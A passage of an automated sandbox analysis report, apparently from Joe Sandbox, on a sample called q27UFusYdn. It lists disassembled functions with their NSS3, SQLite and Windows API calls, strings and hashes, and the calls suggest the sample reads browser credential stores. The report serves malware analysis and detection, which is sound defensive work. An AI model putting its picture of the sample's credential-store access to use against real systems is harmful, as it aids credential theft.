Part of subcall function 6CED9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CF20A27), ref: 6CED9DC6
Part of subcall function 6CED9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CF20A27), ref: 6CED9DD1
Part of subcall function 6CED9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CED9DED

Part of subcall function 6CE66C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CE11C6F,00000000,00000004,?,?), ref: 6CE66C3F

PR_GetCurrentThread.NSS3 ref: 6CE7CD54

Part of subcall function 6CED9BF0: TlsGetValue.KERNEL32(?,?,?,6CF20A75), ref: 6CED9C07

Part of subcall function 6CE67260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CE11CCC,00000000,00000000,?,?), ref: 6CE6729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE7CD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CE7CE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CE7CE2C

Part of subcall function 6CE710C0: TlsGetValue.KERNEL32(?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE710F3
Part of subcall function 6CE710C0: EnterCriticalSection.KERNEL32(?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE7110C
Part of subcall function 6CE710C0: PL_ArenaAllocate.NSS3(?,?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE71141
Part of subcall function 6CE710C0: PR_Unlock.NSS3(?,?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE71182
Part of subcall function 6CE710C0: TlsGetValue.KERNEL32(?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE7119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6CE7CE40

Part of subcall function 6CE714C0: TlsGetValue.KERNEL32 ref: 6CE714E0
Part of subcall function 6CE714C0: EnterCriticalSection.KERNEL32 ref: 6CE714F5
Part of subcall function 6CE714C0: PR_Unlock.NSS3 ref: 6CE7150D

Part of subcall function 6CE7CEE0: PORT_ArenaMark_Util.NSS3(?,6CE7CD93,?), ref: 6CE7CEEE
Part of subcall function 6CE7CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CE7CD93,?), ref: 6CE7CEFC
Part of subcall function 6CE7CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CE7CD93,?), ref: 6CE7CF0B
Part of subcall function 6CE7CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CE7CD93,?), ref: 6CE7CF1D

Part of subcall function 6CE7CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CE7CD93,?), ref: 6CE7CF47
Part of subcall function 6CE7CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CE7CD93,?), ref: 6CE7CF67
Part of subcall function 6CE7CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CE7CD93,?,?,?,?,?,?,?,?,?,?,?,6CE7CD93,?), ref: 6CE7CF78

Strings

5s/, xrefs: 6CE7CCFC

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID: 5s/
API String ID: 3748922049-340167759
Opcode ID: 874cf5d1ca3c387157286b2d57918e29bb680b890a5a735feed7028d3b79e1c9
Instruction ID: c989791bebcf4d8ebacfdf33ad1a700a9d6530ecd3c60e7fa019aa4ec9b67299
Opcode Fuzzy Hash: 874cf5d1ca3c387157286b2d57918e29bb680b890a5a735feed7028d3b79e1c9
Instruction Fuzzy Hash: 49516176B006059BE720DF69DC40BAA77F8EF4834CF350529D95997B40EB31E905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4EEF0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6CE4EF38

Part of subcall function 6CE39520: PK11_IsLoggedIn.NSS3(00000000,?,6CE6379E,?,00000001,?), ref: 6CE39542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6CE4EF53

Part of subcall function 6CE54C20: TlsGetValue.KERNEL32 ref: 6CE54C4C
Part of subcall function 6CE54C20: EnterCriticalSection.KERNEL32(?), ref: 6CE54C60
Part of subcall function 6CE54C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CE54CA1
Part of subcall function 6CE54C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CE54CBE
Part of subcall function 6CE54C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CE54CD2
Part of subcall function 6CE54C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE54D3A

PR_GetCurrentThread.NSS3 ref: 6CE4EF9E

Part of subcall function 6CED9BF0: TlsGetValue.KERNEL32(?,?,?,6CF20A75), ref: 6CED9C07

free.MOZGLUE(00000000), ref: 6CE4EFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CE4F016
free.MOZGLUE(00000000), ref: 6CE4F022

Strings

5s/, xrefs: 6CE4EEF9

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID: 5s/
API String ID: 2459274275-340167759
Opcode ID: 611666001c55fae5d9ddaa29d8156d6d3f19d0429ada9555f7c9cf326d62dab8
Instruction ID: ec2445ec9cfc833a910f6d0ff1f0bc4651311ea570c3c47552b26b18bcf0e799
Opcode Fuzzy Hash: 611666001c55fae5d9ddaa29d8156d6d3f19d0429ada9555f7c9cf326d62dab8
Instruction Fuzzy Hash: D441C471E00209AFDF018FA9EC45BEE7BB9AF48348F104029F914A7350EB72D915CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CEE2F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CEE2FFD
sqlite3_initialize.NSS3 ref: 6CEE3007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CEE3032
sqlite3_mprintf.NSS3(6CF4AAF9,?), ref: 6CEE3073
sqlite3_free.NSS3(?), ref: 6CEE30B3
sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6CEE30C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6CEE30BB

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: 20a4a7733a84b47adc36839a27e4420d504e2d277ffd4eef50bae27bd76800bb
Instruction ID: eea496e865ff5db9dbe3e3c24edb6e7b5302d7a42b6d4292ba497ff78b3f84c5
Opcode Fuzzy Hash: 20a4a7733a84b47adc36839a27e4420d504e2d277ffd4eef50bae27bd76800bb
Instruction Fuzzy Hash: 2441A271600606AFDB00CF65D880A96B7F5FF883A8F258628EC6987B50E731F955CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE24860 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE24894

Part of subcall function 6CE6B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CF418D0,?), ref: 6CE6B095

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE248CA
SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE248DD
SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6CE248FF
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CE24912
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE2494A

Part of subcall function 6CEBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CEBC2BF

Strings

5s/, xrefs: 6CE24872

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
String ID: 5s/
API String ID: 759476665-340167759
Opcode ID: 8eb54b82a5931be6dfc8eaba6ec3fe82682bf2f15948ef651b0bfc6cd6380148
Instruction ID: c1827aa87e7c5f54068e406ff415f8db1d95d5b8ac9d9389c6349efd7775660e
Opcode Fuzzy Hash: 8eb54b82a5931be6dfc8eaba6ec3fe82682bf2f15948ef651b0bfc6cd6380148
Instruction Fuzzy Hash: 9F41B171A18306ABE704CB6ADC81BAB73F89F8421CF24052DFA5597B41F778E904DB52

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3CF40 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6CE3CF80
SECITEM_DupItem_Util.NSS3(?), ref: 6CE3D002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6CE3D016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE3D025
PR_NewLock.NSS3 ref: 6CE3D043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CE3D074

Strings

5s/, xrefs: 6CE3CF49

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID: 5s/
API String ID: 3361105336-340167759
Opcode ID: b05b4ec000bc0a8b32a01c4684d41c886997cbf2368b548d7f3891a016ce1cc1
Instruction ID: e6673660265dd9590e623fe70add47b4636c0294071e11f075a421226f34b914
Opcode Fuzzy Hash: b05b4ec000bc0a8b32a01c4684d41c886997cbf2368b548d7f3891a016ce1cc1
Instruction Fuzzy Hash: FB41CFB4A012218FDB109F29C88039A7AF5EF0871CF306169EC1C8B742D779E585CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6CE1AE50 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CE1AEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6CE1AECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE1AEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6CE1AF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6CF39500), ref: 6CE1AF23

Part of subcall function 6CE6F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6CE6F0C8
Part of subcall function 6CE6F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE6F122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE1AF37

Strings

5s/, xrefs: 6CE1AE62

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID: 5s/
API String ID: 3714604333-340167759
Opcode ID: c760f23c5709ea0be2fcd914fbbdfe362f9ffa1a4c83aaf363414871836f21db
Instruction ID: 8ec5a08bee978870225aa5fdd1799a7c16798a029fdfb68ce4f9e3f3ff52499e
Opcode Fuzzy Hash: c760f23c5709ea0be2fcd914fbbdfe362f9ffa1a4c83aaf363414871836f21db
Instruction Fuzzy Hash: CF213A7294D200ABEB108F189C02BAA77F4AF8972CF344319FC549BB81E731D55987A3

Uniqueness

Uniqueness Score: -1.00%

Function 6CE9EE50 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE9EE85
realloc.MOZGLUE(73350DE1,?), ref: 6CE9EEAE
PORT_Alloc_Util.NSS3(?), ref: 6CE9EEC5

Part of subcall function 6CE70BE0: malloc.MOZGLUE(6CE68D2D,?,00000000,?), ref: 6CE70BF8
Part of subcall function 6CE70BE0: TlsGetValue.KERNEL32(6CE68D2D,?,00000000,?), ref: 6CE70C15

htonl.WSOCK32(?), ref: 6CE9EEE3
htonl.WSOCK32(00000000,?), ref: 6CE9EEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6CE9EF01

Strings

5s/, xrefs: 6CE9EE62

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID: 5s/
API String ID: 1351805024-340167759
Opcode ID: 7738c72d5c889f74bfe8675b05fdc74234aa89722923297e1ad61d8d37925e09
Instruction ID: dea2f683f118ba40a8c89cfe4a9236ec563f76c85dfe441b24709cbb4a38c80d
Opcode Fuzzy Hash: 7738c72d5c889f74bfe8675b05fdc74234aa89722923297e1ad61d8d37925e09
Instruction Fuzzy Hash: 1621A171A00614AFDB109F28DC80B9AB7B4EF49358F258169ED199B742E730EC54CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE28CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6CE3124D,00000001), ref: 6CE28D19
EnterCriticalSection.KERNEL32(?,?,?,?,6CE3124D,00000001), ref: 6CE28D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6CE3124D,00000001), ref: 6CE28D73
PR_Unlock.NSS3(?,?,?,?,?,6CE3124D,00000001), ref: 6CE28D8C

Part of subcall function 6CEBDD70: TlsGetValue.KERNEL32 ref: 6CEBDD8C
Part of subcall function 6CEBDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CEBDDB4

PR_Unlock.NSS3(?,?,?,?,?,6CE3124D,00000001), ref: 6CE28DBA

Strings

KRAM, xrefs: 6CE28D3E
KRAM, xrefs: 6CE28CF9

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: 0e1cd65c4a6721b7175d2e6162af4ad03e76d0dd835e4a4cb3f0bbf43acaf1a5
Instruction ID: 3cb769a6a6c00928a774b197e001e962f29fecabe4e54c4bbbe80ec4f11d1730
Opcode Fuzzy Hash: 0e1cd65c4a6721b7175d2e6162af4ad03e76d0dd835e4a4cb3f0bbf43acaf1a5
Instruction Fuzzy Hash: 9321A1B6A046018FCB50EF78C48476ABBF4FF45318F25896AD99987701D738E84ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CF20ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CF20EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CF20EFA

Part of subcall function 6CE0AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CE0AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF20F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF20F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF20F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF20F2B

Strings

Aborting, xrefs: 6CF20EB3
Assertion failure: %s, at %s:%d, xrefs: 6CF20ED9, 6CF20EE5, 6CF20F06, 6CF20F0B

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: 57ecb3eaae62765ed2aa3bf84142bedaa8bf2f8d4c3afe2b5810f69c0d983284
Instruction ID: 9d4bba94e67616ead2c0cd65bf93ac4ba28d069a2e398c2be61602edad83b5bc
Opcode Fuzzy Hash: 57ecb3eaae62765ed2aa3bf84142bedaa8bf2f8d4c3afe2b5810f69c0d983284
Instruction Fuzzy Hash: 56010CB6A10104BBCF10AFA4DC54EAB3F3DEF42368F000065FE1987712D675E9208AE2

Uniqueness

Uniqueness Score: -1.00%

Function 00418843 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041884F

Part of subcall function 00417B2C: __getptd_noexit.LIBCMT ref: 00417B2F
Part of subcall function 00417B2C: __amsg_exit.LIBCMT ref: 00417B3C

__amsg_exit.LIBCMT ref: 0041886F
__lock.LIBCMT ref: 0041887F
InterlockedDecrement.KERNEL32(?), ref: 0041889C
_free.LIBCMT ref: 004188AF
InterlockedIncrement.KERNEL32(00423530), ref: 004188C7

Strings

05B, xrefs: 004188B5, 004188BD

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID: 05B
API String ID: 3470314060-3788103304
Opcode ID: cb1538446801220004b0e94d2aebbf41e1672ae537431284a663a37179733970
Instruction ID: f16d68fd9582ac4125616c5e50f94de62243aa4c7be40d45a23fde697d24a6fa
Opcode Fuzzy Hash: cb1538446801220004b0e94d2aebbf41e1672ae537431284a663a37179733970
Instruction Fuzzy Hash: 4501AD32A05621ABD720BF6A98057CA7770AF04725F90402FF810A3390CB7CA9C2CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 6CEE4D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CEE4DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CEE4DE0

Strings

%s at line %d of [%.10s], xrefs: 6CEE4DDA
API call with %s database connection pointer, xrefs: 6CEE4DBD
invalid, xrefs: 6CEE4DB8
misuse, xrefs: 6CEE4DD5
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CEE4DCB

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 551f38b0447f2264380654c4740ccb2d6e228a0e89a7af553cd78c74f50dbd96
Instruction ID: fc7b6f0a446f7cb781dbda21032304f16c389a16dd59f342162d5e164a2286f0
Opcode Fuzzy Hash: 551f38b0447f2264380654c4740ccb2d6e228a0e89a7af553cd78c74f50dbd96
Instruction Fuzzy Hash: 97F0B421F146647BD7014196CC10FD63BFA4F1A39DF6649A2EE086BB63D2069D609291

Uniqueness

Uniqueness Score: -1.00%

Function 6CEE4DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CEE4E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CEE4E4D

Strings

%s at line %d of [%.10s], xrefs: 6CEE4E47
API call with %s database connection pointer, xrefs: 6CEE4E2A
invalid, xrefs: 6CEE4E25
misuse, xrefs: 6CEE4E42
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CEE4E38

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
